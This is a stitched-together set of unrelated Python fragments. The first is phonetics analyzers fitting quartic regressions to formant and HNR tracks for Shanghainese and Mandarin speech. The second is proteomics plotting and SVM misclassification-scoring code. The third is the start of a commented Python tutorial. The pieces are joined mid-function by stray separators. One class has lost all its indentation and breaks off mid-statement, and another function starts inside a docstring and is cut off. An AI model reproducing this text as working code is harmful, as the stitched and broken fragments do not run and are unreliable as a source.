    """Quartic regression of mean F1/F2 tracks and their inflection points.

    Fits a 4th-order polynomial to the column-wise means of the barkF1/barkF2
    sample columns, locates where each fit's 2nd derivative peaks, and writes
    the inflections plus fitted/derivative plots.
    """

    def GetName(self):
        """Analyzer display name."""
        return "FormantRegression"

    def GetInputType(self):
        """Kind of input table this analyzer consumes."""
        return "Formant"

    def RunAnalysis(self, df, group_name, output_dir):
        """Fit mean F1/F2 tracks, save inflection CSV and diagnostic plots."""
        # Column-wise means over all rows give the average formant tracks.
        s_f1 = df.loc[:, df.columns.str.startswith("barkF1")].mean()
        s_f2 = df.loc[:, df.columns.str.startswith("barkF2")].mean()
        # 9 samples (columns _2 .. _10) re-indexed onto x = 0..8.
        x = np.arange(0, 9)
        y1 = s_f1['barkF1_2': 'barkF1_10'].to_numpy(dtype='float')
        y2 = s_f2['barkF2_2': 'barkF2_10'].to_numpy(dtype='float')
        coeff1 = np.polyfit(x, y1, 4)
        coeff2 = np.polyfit(x, y2, 4)
        line1 = np.poly1d(coeff1)
        line2 = np.poly1d(coeff2)
        # line1d = np.polyder(line1, 1)
        # line2d = np.polyder(line2, 1)
        line1dd = np.polyder(line1, 2)
        line2dd = np.polyder(line2, 2)
        # Maximize each 2nd derivative by minimizing its negation over [0, 8].
        line1dd_max = minimize_scalar(-line1dd,
                                      bounds=(0, 8), method='bounded')
        line2dd_max = minimize_scalar(-line2dd,
                                      bounds=(0, 8), method='bounded')
        inflection1 = line1dd_max.x
        inflection2 = line2dd_max.x
        df_inflex = pd.DataFrame(
            data={'f1_inflection': [inflection1], 'f2_inflection': [inflection2]})
        df_inflex.to_csv(output_dir / (group_name + '.csv'), index=False)
        # Plot f1/f2
        plt.plot(x, y1, 'o')
        plt.plot(x, y2, 'x')
        plt.plot(x, line1(x), label='F1 fitted')
        plt.plot(x, line2(x), label='F2 fitted')
        plt.legend(bbox_to_anchor=(1.04, 1), loc="upper left")
        plt.title(group_name)
        plt.savefig(output_dir / (group_name + '.fitted.png'),
                    bbox_inches="tight")
        plt.clf()
        plt.cla()
        # plt.plot(x, line1d(x), label='F1 1st deriv')
        # plt.plot(x, line2d(x), label='F2 1st deriv')
        # Plot deriv and inflection
        plt.plot(x, line1dd(x), label='F1 2nd deriv')
        plt.plot(x, line2dd(x), label='F2 2nd deriv')
        plt.axvline(x=inflection1, linestyle=':', label='F1 inflection')
        plt.axvline(x=inflection2, linestyle='-.', label='F2 inflection')
        plt.legend(bbox_to_anchor=(1.04, 1), loc="upper left")
        plt.title(group_name)
        plt.savefig(output_dir / (group_name + '.inflection.png'),
                    bbox_inches="tight")
        plt.clf()
        plt.cla()
        output_debug_path = output_dir / (group_name + '.debug.csv')
        df.to_csv(output_debug_path, index=False)
class HnrRegression(Analyzer):
    """Quartic regression of the mean HNR track and its inflection point.

    Smooths adjacent HNR samples into midpoints, fits a 4th-order polynomial
    to the mean midpoint track, finds where its 2nd derivative peaks, and
    writes the inflection plus a diagnostic plot.
    """

    def GetName(self):
        """Analyzer display name."""
        return "HnrRegression"

    def GetInputType(self):
        """Kind of input table this analyzer consumes."""
        return "HNR"

    def RunAnalysis(self, df, group_name, output_dir):
        """Fit the mean HNR midpoint track, save inflection CSV and plot."""
        # Midpoints of adjacent samples: mid_i = mean(HNR_i, HNR_{i+1}).
        for i in range(1, 10):
            df['mid_'+str(i)] = df[['HNR_'+str(i),
                                    'HNR_'+str(i+1)]].mean(axis=1)
        sy = df.loc[:, df.columns.str.startswith('mid_')].mean()
        y = sy['mid_1': 'mid_9'].to_numpy(dtype='float')
        x = np.arange(0, 9)
        coeff = np.polyfit(x, y, 4)
        line1 = np.poly1d(coeff)
        line1dd = np.polyder(line1, 2)
        # Maximize the 2nd derivative by minimizing its negation over [0, 8].
        line1dd_max = minimize_scalar(-line1dd,
                                      bounds=(0, 8), method='bounded')
        inflection = line1dd_max.x
        df_inflex = pd.DataFrame(data={'inflection': [inflection]})
        df_inflex.to_csv(output_dir / (group_name + '.csv'), index=False)
        # Diagnostic plot: data, fit, 2nd derivative, inflection line.
        plt.plot(x, y, 'o')
        plt.plot(x, line1(x), label='fitted')
        plt.plot(x, line1dd(x), label='2nd deriv')
        plt.axvline(x=inflection, linestyle=':', label='inflection')
        plt.legend(bbox_to_anchor=(1.04, 1), loc="upper left")
        plt.title(group_name)
        plt.savefig(output_dir / (group_name + '.png'), bbox_inches="tight")
        plt.clf()
        plt.cla()
        output_debug_path = output_dir / (group_name + '.debug.csv')
        df.to_csv(output_debug_path, index=False)
class HnrQuantilesMean(Analyzer):
    """Mean HNR values at the 25/50/75% quantile points for a group.

    Writes '<group>.csv' (one row of means) and '<group>.debug.csv'
    (the full per-row table).
    """

    def GetName(self):
        """Analyzer display name."""
        return "HnrQuantilesMean"

    def GetInputType(self):
        """Kind of input table this analyzer consumes."""
        return "HNR"

    def RunAnalysis(self, df, group_name, output_dir):
        """Add HNR quantile columns and write summary + debug CSVs."""
        # 25%/75% approximated by averaging adjacent samples; 50% is HNR_5.
        df['HNR_p25'] = df[['HNR_2', 'HNR_3']].mean(axis=1)
        df['HNR_p75'] = df[['HNR_7', 'HNR_8']].mean(axis=1)
        df['HNR_p50'] = df[['HNR_5']]
        output = pd.DataFrame(
            df.loc[:, df.columns.str.startswith("HNR_p")].mean()).T
        output_path = output_dir / (group_name + '.csv')
        output.to_csv(output_path, index=False)
        output_debug_path = output_dir / (group_name + '.debug.csv')
        df.to_csv(output_debug_path, index=False)
class HnrTTest(Analyzer):
    """Mean HNR values at the 25/50/75% quantile points for a group.

    NOTE: despite the name, no t-test is performed here — only quantile
    means are written out, plus a per-row debug table.
    """

    def GetName(self):
        """Analyzer display name."""
        return "HnrTTest"

    def GetInputType(self):
        """Kind of input table this analyzer consumes."""
        return "HNR"

    def RunAnalysis(self, df, group_name, output_dir):
        """Add HNR quantile columns and write summary + debug CSVs."""
        # 25%/75% approximated by averaging adjacent samples; 50% is HNR_5.
        df['HNR_25p'] = df[['HNR_2', 'HNR_3']].mean(axis=1)
        df['HNR_75p'] = df[['HNR_7', 'HNR_8']].mean(axis=1)
        df['HNR_50p'] = df[['HNR_5']]
        # BUGFIX: the original selected columns starting with "diff", which
        # never exist in the HNR table, so the summary CSV was always empty.
        # Summarize the quantile columns that were just computed instead.
        output = pd.DataFrame(
            df[['HNR_25p', 'HNR_50p', 'HNR_75p']].mean()).T
        output_path = output_dir / (group_name + '.csv')
        output.to_csv(output_path, index=False)
        output_debug_path = output_dir / (group_name + '.debug.csv')
        df.to_csv(output_debug_path, index=False)
def ComputeF1F2Diff(df):
    """Add 25th/75th-percentile bark formant columns and their 75-25 spans.

    Mutates and returns `df` with six new columns: barkF{1,2}_{25p,75p}
    (adjacent-sample means) and diff_F{1,2}_7525 (75p minus 25p).
    """
    # Quantile estimates: average the two samples flanking each point.
    for formant in ('F1', 'F2'):
        prefix = 'bark' + formant
        df[prefix + '_25p'] = df[[prefix + '_3', prefix + '_4']].mean(axis=1)
        df[prefix + '_75p'] = df[[prefix + '_8', prefix + '_9']].mean(axis=1)
    # Span between the two quantile estimates, per formant.
    for formant in ('F1', 'F2'):
        prefix = 'bark' + formant
        df['diff_' + formant + '_7525'] = df[prefix + '_75p'] - df[prefix + '_25p']
    return df
class FormantQuantilesF1F2Base(Analyzer):
    """Base analyzer comparing 75-25% formant spans across filter groups.

    `filter_map` maps a series label to a list of row filters; a row belongs
    to a label only if it matches *all* of that label's filters. Per label,
    mean diff_F1/diff_F2 spans are written to CSV and drawn as grouped bars.
    """

    def __init__(self, filter_map):
        # label -> list of filters that must all match a row
        self.filter_map = filter_map

    def RunAnalysis(self, df, group_name, output_dir):
        """Bucket rows per label, write per-label CSVs, and save a bar chart."""
        matched_rows_map = {}
        for key, _ in self.filter_map.items():
            matched_rows_map[key] = []
        for _, row in df.iterrows():
            for key, filters in self.filter_map.items():
                is_all_matched = [f.IsMatched(row) for f in filters]
                if np.all(is_all_matched):
                    matched_rows_map[key].append(row)
        matched_df = {}
        for key, rows in matched_rows_map.items():
            matched_df[key] = pd.DataFrame(rows)
        # Two bar groups (delta_F1, delta_F2); x shifts per label series.
        x = np.arange(2)
        for key, mdf in matched_df.items():
            mdf = ComputeF1F2Diff(mdf)
            df_mean = pd.DataFrame(
                mdf.loc[:, mdf.columns.str.startswith("diff")].mean()).T
            mdf.to_csv(output_dir / (group_name + '@@@' +
                                     key + '.debug.csv'), index=False)
            df_mean.to_csv(output_dir / (group_name + '@@@' +
                                         key+'Mean.debug.csv'), index=False)
            y = [df_mean['diff_F1_7525'][0], df_mean['diff_F2_7525'][0]]
            plt.bar(x, y, width=kBarWidth, label=key)
            # Shift the next series one bar-width to the right.
            x = [xval + kBarWidth for xval in x]
        plt.xticks([r + kBarWidth for r in range(2)], ('delta_F1', 'delta_F2'))
        plt.legend(bbox_to_anchor=(1.04, 1), loc="upper left")
        plt.title(group_name)
        plt.savefig(output_dir / (group_name + '.png'), bbox_inches="tight")
        # Reset figure state for the next analysis.
        plt.clf()
        plt.cla()
class FormantQuantilesF1F2SaSb(FormantQuantilesF1F2Base):
    """Compare F1/F2 spans between Shanghainese position 'a' and 'b' rows."""

    def __init__(self):
        super().__init__({
            'Sa': [filter.IsShanghainese(), filter.IsPosition('a')],
            'Sb': [filter.IsShanghainese(), filter.IsPosition('b')],
        })
class FormantQuantilesF1F2SbMb(FormantQuantilesF1F2Base):
    """Compare F1/F2 spans between Shanghainese 'b' and Mandarin 'b' rows."""

    def __init__(self):
        super().__init__({
            'Sb': [filter.IsShanghainese(), filter.IsPosition('b')],
            'Mb': [filter.IsMandarin(), filter.IsPosition('b')],
        })
class FormantQuantilesSbMbBase(Analyzer):
    """Compare one formant's 75-25% span between Shanghainese-b and Mandarin-b.

    `formant` selects 'F1' or 'F2'. Rows are split into the two groups,
    per-group means are written to CSV, and a two-bar chart is saved.
    """

    def __init__(self, formant):
        # 'F1' or 'F2' — selects which diff_<formant>_7525 column is plotted.
        self.formant = formant

    def RunAnalysis(self, df, group_name, output_dir):
        """Split rows into Sb/Mb groups, write CSVs, and save the bar chart."""
        rows_sb = []
        rows_mb = []
        for _, row in df.iterrows():
            if filter.IsShanghainese().IsMatched(row) and filter.IsPosition('b').IsMatched(row):
                rows_sb.append(row)
                continue
            if filter.IsMandarin().IsMatched(row) and filter.IsPosition('b').IsMatched(row):
                rows_mb.append(row)
                continue
        df_sb = pd.DataFrame(rows_sb)
        df_sb = ComputeF1F2Diff(df_sb)
        df_sb_avg = pd.DataFrame(
            df_sb.loc[:, df_sb.columns.str.startswith("diff")].mean()).T
        df_sb.to_csv(output_dir / (group_name +
                                   '@@@Sb.debug.csv'), index=False)
        df_sb_avg.to_csv(output_dir / (group_name +
                                       '@@@SbMean.debug.csv'), index=False)
        df_mb = pd.DataFrame(rows_mb)
        df_mb = ComputeF1F2Diff(df_mb)
        df_mb_avg = pd.DataFrame(
            df_mb.loc[:, df_mb.columns.str.startswith("diff")].mean()).T
        df_mb.to_csv(output_dir / (group_name +
                                   '@@@Mb.debug.csv'), index=False)
        df_mb_avg.to_csv(output_dir / (group_name +
                                       '@@@MbMean.debug.csv'), index=False)
        # Two bars: the selected formant's mean span in each group.
        x = ['Sb', 'Mb']
        y = [df_sb_avg['diff_' + self.formant + '_7525'][0],
             df_mb_avg['diff_'+self.formant+'_7525'][0]]
        plt.bar(x, y, width=kBarWidth)
        plt.title(group_name)
        plt.savefig(output_dir / (group_name + '.png'), bbox_inches="tight")
        # Reset figure state for the next analysis.
        plt.clf()
        plt.cla()
class FormantQuantilesF1SbMb(FormantQuantilesSbMbBase):
    """Sb-vs-Mb comparison of the F1 75-25% span."""

    def __init__(self):
        super().__init__('F1')
class FormantQuantilesF2SbMb(FormantQuantilesSbMbBase):
    """Sb-vs-Mb comparison of the F2 75-25% span."""

    def __init__(self):
        super().__init__('F2')
class FormantRegressionBase(Analyzer):
def __init__(self, filters):
self.filters = filters
def RunAnalysis(self, df, group_name, output_dir):
matched_rows = []
for _, row in df.iterrows():
is_all_matched = [f.IsMatched(row) for f in self.filters]
if np.all(is_all_matched):
matched_rows.append(row)
df = pd.DataFrame(matched_rows)
filter_name = '_'.join([f.GetValue() for f in self.filters])
full_group_name = group_name + '@@' + filter_name
s_f1 = df.loc[:, df.columns.str.startswith("barkF1")].mean()
s_f2 = df.loc[:, df.columns.str.startswith("barkF2")].mean()
x = np.arange(0, 9)
y1 = s_f1['barkF1_2': 'barkF1_10'].to_numpy(dtype='float')
y2 = s_f2['barkF2_2': 'barkF2_10'].to_numpy(dtype='float')
coeff1 = np.polyfit(x, y1, 4)
coeff2 = np.polyfit(x, y2, 4)
line1 = np.poly1d(coeff1)
line2 = np.poly1d(coeff2)
line1dd = np.polyder(line1, 2)
line2dd = np.polyder(line2, 2)
# line1ddd = np.polyder(line1, 3)
# line2ddd = np.polyder(line2, 3)
line1dd_max = minimize_scalar(-line1dd,
bounds=(0, 8), method='bounded')
line2dd_max = minimize_scalar(-line2dd,
bounds=(0, 8), method='bounded')
inflection1 = line1dd_max.x
inflection2 = line2dd_max.x
# line1ddd_max_left = minimize_scalar(-line1ddd,
# bounds=(0, inflection1), method='bounded')
# line1ddd_max_right = minimize_scalar(-line1ddd,
# bounds=(inflection1, 8), method='bounded')
# line2ddd_max_left = minimize_scalar(-line2ddd,
# bounds=(0, inflection2), method='bounded')
# line2ddd_max_right = minimize_scalar(-line2ddd,
# bounds=(inflection2, 8), method='bounded')
# inflection1d_left = line1ddd_max_left.x
# inflection1d_right = line1ddd_max_right.x
# inflection2d_left = line2ddd_max_left.x
# inflection2d_right = line2ddd_max_right.x
df_inflex = pd.DataFrame(
data={'f1_inflection': [inflection1], 'f2_inflection': [inflection2]})
df_inflex.to_csv(output_dir / (full_group_name + '.csv'), | |
"Cluster", "Experiment"
Returns:
fig_dynamic_range: bar plot, dynamic range of each protein cluster for desired experiments is displayed.
"""
df_dynamicRange_combined = self.df_dynamicRange_combined.copy()
df_dynamicRange_combined = df_dynamicRange_combined[df_dynamicRange_combined["Experiment"].isin(multi_choice)]
df_dynamicRange_combined = df_dynamicRange_combined.assign(Experiment_lexicographic_sort = pd.Categorical(df_dynamicRange_combined["Experiment"],
categories=multi_choice, ordered=True))
df_dynamicRange_combined.sort_values(["Experiment_lexicographic_sort", "Dynamic Range"], inplace=True)
fig_dynamic_range = px.bar(df_dynamicRange_combined,
x="Cluster",
y="Dynamic Range",
base="Min",
facet_row="Experiment",
template="simple_white",
height=400*len(multi_choice),
width=1200)
df_dynamicRange_combined_ref = df_dynamicRange_combined.drop(["Experiment_lexicographic_sort"], axis=1)
df_dynamicRange_combined_ref = df_dynamicRange_combined.set_index(["Cluster", "Experiment"], drop=False).unstack("Cluster")["Dynamic Range"]
df_dynamicRange_combined_ref = df_dynamicRange_combined_ref.div(df_dynamicRange_combined_ref.xs(ref_exp))
df_RelDynamicRange = pd.concat([df_dynamicRange_combined_ref.median(axis=1), df_dynamicRange_combined_ref.sem(axis=1)], axis=1,
keys=["Dynamic Range (rel, median)", "SEM"]).reset_index()
if collapse_cluster == False:
df_dynamicRange_combined_ref = df_dynamicRange_combined_ref.stack("Cluster")
df_dynamicRange_combined_ref.name="Normalized Dynamic Range"
df_dynamicRange_combined_ref = df_dynamicRange_combined_ref.reset_index()
fig_RelDynamicRange = px.bar(df_dynamicRange_combined_ref,
x="Cluster",
y="Normalized Dynamic Range",
title="Dynamic Range - normalization to reference experiment: {}".format(ref_exp),
barmode="group",
template="simple_white",
color="Experiment")
fig_RelDynamicRange.update_xaxes(categoryorder="total ascending")
fig_RelDynamicRange.update_layout(autosize=False,
width=1200 if len(multi_choice)<=3 else 300*len(multi_choice),
height=500,
template="simple_white"
)
else:
fig_RelDynamicRange = px.bar(df_RelDynamicRange.sort_values("Dynamic Range (rel, median)"),
x="Experiment",
y="Dynamic Range (rel, median)",
error_x="SEM", error_y="SEM",
template="simple_white",
title="Dynamic Range - median of all individual normalized medians - reference experiment: {}".format(ref_exp),
color="Experiment")
fig_RelDynamicRange.update_layout(autosize=False,
width=250*len(multi_choice),
height=500,
template="simple_white"
)
return pn.Column(pn.Row(fig_dynamic_range), pn.Row(fig_RelDynamicRange))
def calculate_global_scatter(self, multi_choice, metric, consolidation):
    """
    A distribution plot of the profile scatter in each experiment is generated, with variable distance metric and consolidation of replicates.

    Args:
        self:
            df_01_filtered_combined: df, indexed
        multi_choice: list of experiment names
        metric: distance metric, one of 'euclidean distance', 'manhattan distance', '1 - cosine correlation', '1 - pearson correlation'
        consolidation: method to consolidate replicate distances, one of 'median', 'average', 'sum'

    Returns:
        plot: plotly.figure_factory.displot, shows kernel density estimation in the main pane and a rug plot underneath. Traces are sorted by ascending median of the distribution.
    """

    # Option dictionaries: map the user-facing option strings to callables/settings
    cons_functions = {
        "median": np.median,
        "average": np.mean,
        "sum": np.sum
    }
    metrics = {
        "euclidean distance": "euclidean",
        "manhattan distance": "manhattan",
        "1 - cosine correlation": "cosine",
        "1 - pearson correlation": lambda x,y: 1-np.corrcoef(x,y)[0][1],
        # "... to ..." entries: [reference-profile aggregator, paired distance function]
        # NOTE(review): pw is presumably sklearn.metrics.pairwise — verify the import
        "manhattan distance to average profile": [np.mean, pw.paired_manhattan_distances],
        "manhattan distance to median profile": [np.median, pw.paired_manhattan_distances]
    }

    # Option assertion
    assert consolidation in cons_functions.keys()
    assert metric in metrics.keys()

    # Filter experiments and intersection of proteins
    df = self.df_01_filtered_combined.loc[
        self.df_01_filtered_combined.index.get_level_values("Experiment").isin(multi_choice)].copy()
    df.index = df.index.droplevel(["Exp_Map", "Gene names", "Compartment"])
    # peptide-level data: identify rows by Sequence instead of Protein IDs
    if "Sequence" in df.index.names:
        df.index = df.index.droplevel(["Protein IDs"])
    # keep only rows quantified in every Experiment/Map combination
    df_across = df.unstack(["Experiment", "Map"]).dropna().stack(["Experiment", "Map"])
    nPG = df_across.unstack(["Experiment", "Map"]).shape[0]

    # Calculate and consolidate distances
    distances = pd.DataFrame()
    for exp in multi_choice:
        df_m = df_across.xs(exp, level="Experiment", axis=0)
        maps = list(set(df_m.index.get_level_values("Map")))
        # this if clause switches between pairwise comparisons of profiles (else) and comparisons to an average/median profile
        if " to " in metric:
            df_m = df_m.unstack("Map")
            # calculate reference profiles
            df_profiles = df_m.stack("Fraction").apply(metrics[metric][0], axis=1).unstack("Fraction")
            # calculate the distance for every map
            distances_m = pd.DataFrame()
            for m in maps:
                dist_m = pd.DataFrame(metrics[metric][1](df_m.xs(m, level="Map", axis=1), df_profiles), columns = [m])
                distances_m = pd.concat([distances_m, dist_m], axis=1)
            distances_m.index = df_m.index
        else:
            distances_m = pd.DataFrame()
            # loop over pairs of maps
            for i,mapi in enumerate(maps):
                for j,mapj in enumerate(maps):
                    # only look at each comparison once
                    if j <= i:
                        continue
                    dist = pw.paired_distances(df_m.xs(mapi, level="Map", axis=0).values,
                                               df_m.xs(mapj, level="Map", axis=0).values,
                                               metric = metrics[metric])
                    dist = pd.Series(dist, name="_".join([mapi,mapj]))
                    distances_m = pd.concat([distances_m, dist], axis=1)
            distances_m.index = df_m.xs(maps[0], level="Map", axis=0).index
        # collapse the per-map (or per-pair) distances into one value per protein
        distances = pd.concat([distances, pd.Series(distances_m.apply(cons_functions[consolidation], axis=1), name=exp)], axis=1)
    # NOTE(review): relabels with the last experiment's index — assumes all
    # experiments share the same protein index (the dropna above enforces this)
    distances.index = distances_m.index

    self.distances = distances

    # Create and return plot
    plot = ff.create_distplot(distances.T.values, distances.columns, show_hist=False)
    plot.update_layout(title="Distribution of {} {}s, n = {}".format(metric, consolidation, nPG),
                       width=1500, height=600, template="simple_white", xaxis={"rangemode": "nonnegative"})
    return plot
def svm_processing(self):
    """
    The misclassification matrix, generated by Perseus, will be used for Recall/Precision calculation of each individual cluster and on a global level.
    Data will be stored in a local dictionary that will be assigned to the global dictionary.

    Args:
        self.df_SVM: dataframe, provided by Perseus, no index;
            Column names: e.g. "Predicted: ER", "Predicted: NPC"
            Rows: e.g. "True: ER", "True: NPC"

    Returns:
        self.analysed_datasets_dict:
            local dictionary (SVM_dict) will be assigned to the global dictionary self.analysed_datasets_dict, that is available for downloading
            {"Experiment name" : {see def read_jsonFile(self) [below]}
                {"Misclassification Analysis":
                    {
                        "True: ER" : {
                            "Recall": int,
                            "FDR": int,
                            "Precision": int,
                            "F1": int
                        }
                        "True: NPC" : {...}
                        ...
                        "Summary": {...}
                    }
                }
            }
    """
    global_SVM_dict_total = {}
    global_SVM_dict = {}
    for exp in self.json_dict.keys():
        try:
            df_SVM = pd.read_json(self.json_dict[exp]["Misclassification Matrix"])
            # strip the "True: " prefix from the row labels
            # NOTE(review): the pattern is handed to str.replace — regex vs. literal
            # behaviour depends on the pandas version; verify
            df_SVM["T: True group"] = df_SVM["T: True group"].str.replace(r'True: ', '')
        except KeyError:
            # this experiment has no stored misclassification matrix -> skip it
            continue
        SVM_dict = {}

        # NOTE(review): np.diag assumes the column order matches the row order so
        # the diagonal holds the correctly classified counts per cluster — confirm
        # for the Perseus export, which also carries the "T: True group" column
        all_correct = np.diag(df_SVM)
        members = df_SVM.sum(axis=1)  # cluster sizes (row sums)
        total_members = 0
        membrame_members = 0  # members of organellar ("membrane") clusters (sic)
        membrane_correct = 0
        all_organelle_recall = []
        all_organelle_precision = []
        all_organelle_f1 = []
        F1_all_cluster = []
        no_of_membrane_clusters = 0
        total_correct = sum(all_correct)
        predicted_one_organelle = df_SVM.sum(axis=0)  # predictions per cluster (column sums)

        # per-cluster recall / FDR / precision / F1
        for i in range(len(df_SVM)):
            total_members = total_members + members[i]
            recall = all_correct[i]/members[i]
            fdr = (predicted_one_organelle[i]-all_correct[i])/predicted_one_organelle[i]
            precision = 1-fdr
            F1 = statistics.harmonic_mean([recall, precision])
            F1_all_cluster.append(F1)
            SVM_dict[df_SVM["T: True group"][i]] = {"Recall": recall, "FDR": fdr, "Precision": precision, "F1": F1}
            # every cluster except these three non-organellar ones counts towards
            # the organelle/"membrane" summary statistics
            if df_SVM["T: True group"][i]!="Nuclear pore complex" and df_SVM["T: True group"][i]!="Large Protein Complex" and df_SVM["T: True group"][i]!="Actin binding proteins" :
                no_of_membrane_clusters = no_of_membrane_clusters+1
                membrame_members = membrame_members + members[i]
                membrane_correct = membrane_correct + all_correct[i]
                all_organelle_f1.append(F1)
                all_organelle_recall.append(recall)
                all_organelle_precision.append(precision)

        # summary statistics across clusters for this experiment
        total_recall = total_correct/total_members
        membrane_recall = membrane_correct/membrame_members
        av_per_organelle_recall = statistics.mean(all_organelle_recall)
        median_per_organelle_recall = statistics.median(all_organelle_recall)
        av_per_organelle_precision = statistics.mean(all_organelle_precision)
        avg_organelle_f1 = statistics.mean(all_organelle_f1)
        avg_F1_all_cluster = statistics.mean(F1_all_cluster)

        SVM_dict_total = {}
        SVM_dict_total["Avg. all clusters"] = {"Recall": total_recall, "F1": avg_F1_all_cluster} #total recall = marker prediction accuracy
        SVM_dict_total["Avg. all organelles"] = {"Recall": av_per_organelle_recall, "F1": avg_organelle_f1, "Precision": av_per_organelle_precision}
        SVM_dict_total["Membrane"] = {"Recall": membrane_recall}
        SVM_dict_total["Median. per organelle"] = {"Recall": median_per_organelle_recall}

        global_SVM_dict[exp] = SVM_dict
        global_SVM_dict_total[exp] = SVM_dict_total
        self.global_SVM_dict = global_SVM_dict
        self.global_SVM_dict_total = global_SVM_dict_total

    if global_SVM_dict=={}:
        # no misclassification matrix found for any experiment -> nothing cached
        self.cache_stored_SVM = False
        return
    else:
        # reshape the nested dicts into (Experiment, Type)-indexed frames,
        # transposed so that metrics become rows (as expected by svm_plotting)
        df_clusterPerformance_global = pd.DataFrame.from_dict({(i,j): global_SVM_dict[i][j]
                                                               for i in global_SVM_dict.keys()
                                                               for j in global_SVM_dict[i].keys()},
                                                              orient='index')
        df_clusterPerformance_global.index.names = ["Experiment", "Type"]
        self.df_clusterPerformance_global = df_clusterPerformance_global.T
        df_AvgClusterPerformance_global = pd.DataFrame.from_dict({(i,j): global_SVM_dict_total[i][j]
                                                                  for i in global_SVM_dict_total.keys()
                                                                  for j in global_SVM_dict_total[i].keys()},
                                                                 orient='index')
        df_AvgClusterPerformance_global.index.names = ["Experiment", "Type"]
        self.df_AvgClusterPerformance_global = df_AvgClusterPerformance_global.T
        self.cache_stored_SVM = True
        return
def svm_plotting(self, multi_choice):
    """
    The markerperformance (line/scatter plot) as well as marker prediction accuracy (bar plot) is visualized.

    Args:
        self: df_AvgClusterPerformance_global
              df_clusterPerformance_global
        multi_choice: list of experiment names

    Returns:
        fig_markerPredictionAccuracy: bar plot, overall recall per experiment
        fig_clusterPerformance: scatter plot, per-cluster F1 scores per experiment
    """
    df_clusterPerformance_global = self.df_clusterPerformance_global
    df_AvgClusterPerformance_global = self.df_AvgClusterPerformance_global

    # overall recall ("marker prediction accuracy"), one bar per experiment
    df_AvgAllCluster = df_AvgClusterPerformance_global.xs("Avg. all clusters", level='Type', axis=1)
    fig_markerPredictionAccuracy = go.Figure()#data=[go.Bar(x=df_test.columns, y=df_test.loc["Recall"])])
    for exp in multi_choice:
        fig_markerPredictionAccuracy.add_trace(go.Bar(x=[exp], y=[df_AvgAllCluster[exp].loc["Recall"]], name=exp))
    fig_markerPredictionAccuracy.update_layout(template="simple_white", #showlegend=False,
                                               title="Marker prediction accuracy - Overall recall",
                                               xaxis=go.layout.XAxis(linecolor="black",
                                                                     linewidth=1,
                                                                     mirror=True),
                                               yaxis=go.layout.YAxis(linecolor="black",
                                                                     linewidth=1,
                                                                     title="Marker prediction accuracy [%]",
                                                                     mirror=True),
                                               )

    # per-cluster F1 traces plus the two averaged summary points per experiment
    fig_clusterPerformance = go.Figure()
    list_data_type = ["Avg. all clusters", "Avg. all organelles"]
    for i,exp in enumerate(multi_choice):
        df_clusterPerformance = df_clusterPerformance_global.xs(exp, level='Experiment', axis=1)
        df_AvgClusterPerformance = df_AvgClusterPerformance_global.xs(exp, level='Experiment', axis=1)
        fig_clusterPerformance.add_trace(go.Scatter(x=df_clusterPerformance.columns, y=df_clusterPerformance.loc["F1"],
                                                    marker=dict(color=pio.templates["simple_white"].layout["colorway"][i]), name=exp))
        # summary markers share the experiment's colour but are hidden from the legend
        for data_type in list_data_type:
            fig_clusterPerformance.add_trace(go.Scatter(x=[data_type], y=[df_AvgClusterPerformance[data_type].loc["F1"]],
                                                        mode="markers",
                                                        showlegend=False,
                                                        marker=dict(color=pio.templates["simple_white"].layout["colorway"][i])
                                                        ))
    fig_clusterPerformance.update_layout(template="simple_white", #showlegend=False,
                                         title="Cluster wise SVM analysis",
                                         xaxis=go.layout.XAxis(linecolor="black",
                                                               linewidth=1,
                                                               mirror=True),
                                         yaxis=go.layout.YAxis(linecolor="black",
                                                               linewidth=1,
                                                               title="F1 score", #- harmonic mean of recall and precision
                                                               mirror=True),
                                         )
    return fig_markerPredictionAccuracy, fig_clusterPerformance
def __repr__(self):
    """Return a debug representation listing every instance attribute."""
    # vars(self) is identical to self.__dict__
    return str(vars(self))
def svm_heatmap(df_SVM):
    """
    The misclassification matrix, generated by Perseus, will be displayed as a heatmap.

    Args:
        df_SVM: either a dict-like json entry holding the serialized matrix under
            "Misclassification Matrix", or the misclassification dataframe itself
            (no index; column names e.g. "Predicted: ER", rows e.g. "True: ER").

    Returns:
        fig_SVMheatmap: heatmap of the misclassification matrix
    """
    # Accept both the raw json payload and an already-parsed dataframe.
    # (Replaces the original bare "except:" that duplicated the set_index call.)
    try:
        df_SVM = pd.read_json(df_SVM["Misclassification Matrix"])
    except (KeyError, TypeError, ValueError):
        pass  # already a dataframe-like misclassification matrix
    # index by true group and reverse the row order so the heatmap reads top-down
    df_SVM = df_SVM.set_index("T: True group")[::-1]

    y_axis_label = df_SVM.index
    x_axis_label = df_SVM.columns
    data_svm = df_SVM.values
    fig_SVMheatmap = go.Figure()
    fig_SVMheatmap.add_trace(go.Heatmap(
        z=data_svm,
        x = x_axis_label,
        y = y_axis_label,
        # zero counts render green, small counts fade quickly from white to red
        colorscale=[
            [0.0, "green"],
            [0.01, "white"],
            [1.0, "red"]
        ],
    ))
    return fig_SVMheatmap
def reframe_df_01_fromJson_for_Perseus(json_dict):
"""
Make 0-1 normalized data from all experiments available for Perseus
Args:
json: dictionary, json file uploaded in manage dataset tab.
Return:
        df: 0-1 normalized data (globally normalized), with Gene names, Protein IDs, Compartment as columns
Pattern for Column data: Exp_Map_Fraction
"""
for exp_name in json_dict.keys():
for data_type in json_dict[exp_name].keys():
if data_type == "0/1 normalized data" and exp_name == list(json_dict.keys())[0]:
df_01_combined | |
####################################################
## 0. Useful stuff about Python
####################################################
# Python Enhancement Proposals, or PEPs, are useful conventions which guide
# the user in writing readable and pretty code, as well as many other
# details about Python. PEP-8 is the Style Guide (https://www.python.org/dev/peps/pep-0008/)
# According to PEP-8, line length should be limited to 79 characters
# No brackets are used for code blocks. Instead, indentation is used
# The general consensus is to use 4 spaces, but it is not necessary
# What is necessary is to NOT mix tabs and spaces. Python will complain
# NOTE: You can still press the "Tab" key, but make sure your IDE is set
# up so that it will type 4 spaces per press.
# snake_case is the norm, as opposed to camelCase as is standard in other
# languages
# Single line comments start with a hash symbol.
""" Multiline strings can be written
using three "s, and are often used
as documentation (docstrings).
"""
type(a_variable) # Used to find out the type of a variable
help(an_object) # Used to print documentation about a class or function (the
# ones written in the triple double-quotes)
dir(an_object) # Used to find all the variable and function names of
# an object or module
# Special Python variables will be surrounded by double underscores.
# A particularly useful one is __name__, which lets the module know
# if it is the one being executed as the main program, in which case that
# module's __name__ = "__main__", otherwise it will be its own filename.
# https://www.geeksforgeeks.org/__name__-special-variable-python/
# EVERYTHING in Python is an object
# Python has a print function. We'll look at functions later, for now:
